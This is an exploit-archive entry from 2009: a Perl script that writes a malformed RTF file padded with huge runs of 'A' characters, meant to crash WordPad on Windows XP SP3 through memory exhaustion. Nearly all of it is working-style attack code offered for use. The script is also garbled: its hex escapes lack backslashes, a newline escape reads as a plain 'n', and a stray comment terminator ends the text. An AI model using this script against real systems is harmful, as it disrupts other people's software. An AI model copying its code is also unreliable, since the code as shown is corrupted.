# Title : MS Wordpad on winXP SP3 Local Crash Exploit
# Published : 2009-08-12
# Author : murderkey
#!/usr/bin/perl
#Microsoft Wordpad on WinXP SP3 Memory Exhaustion Vulnerability - 0day
#Works on WinXP SP3!
#bug found by murderkey in Hellcode Labs.
#exploit coded by karak0rsan aka musashi
#Hellcode Research
#just a fuckin' lame 0day bug for fun!
$file = "hellcoded.rtf";
$header =
"x7bx5cx72x74x66x31x5cx61x6ex73x69x5cx61x6ex73x69x63x70x67x31x32".
"x35x34x5cx64x65x66x66x30x5cx64x65x66x6cx61x6ex67x31x30x35x35x7b".
"x5cx66x6fx6ex74x74x62x6cx7bx5cx66x30x5cx66x73x77x69x73x73x5cx66".
"x63x68x61x72x73x65x74x31x36x32x7bx5cx2ax5cx66x6ex61x6dx65x20x41".
"x72x69x61x6cx3bx7dx41x72x69x61x6cx20x54x55x52x3bx7dx7dx0ax7bx5c".
"x2ax5cx67x65x6ex65x72x61x74x6fx72x20x4dx73x66x74x65x64x69x74x20".
"x35x2ex34x31x2ex31x35x2ex31x35x31x35x3bx7dx5cx76x69x65x77x6bx69".
"x6ex64x34x5cx75x63x31x5cx70x61x72x64x5cx66x30x5cx66x73x32x30";
$subheader = "x5cx41x41x41x41x41x5cx41x41x41x41x5cx70x61x72x0ax7dx0ax00";
$ekheader = "x5cx70x61x72x0a";
$buffer = "A" x 578001;
$buffer2 = "A" x 289000;
$buffer3 = "A" x 18186;
$buffer4 = "A" x 863973;
$buffer5= "A" x 578000;
$memory = $header.$buffer.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer4.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$ekheader.$buffer5.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer2.$ekheader.$buffer3.$subheader;
open(file, '>' . $file);
print file $memory;
close(file);
print "File PoC exploit has created!n";
exit(); */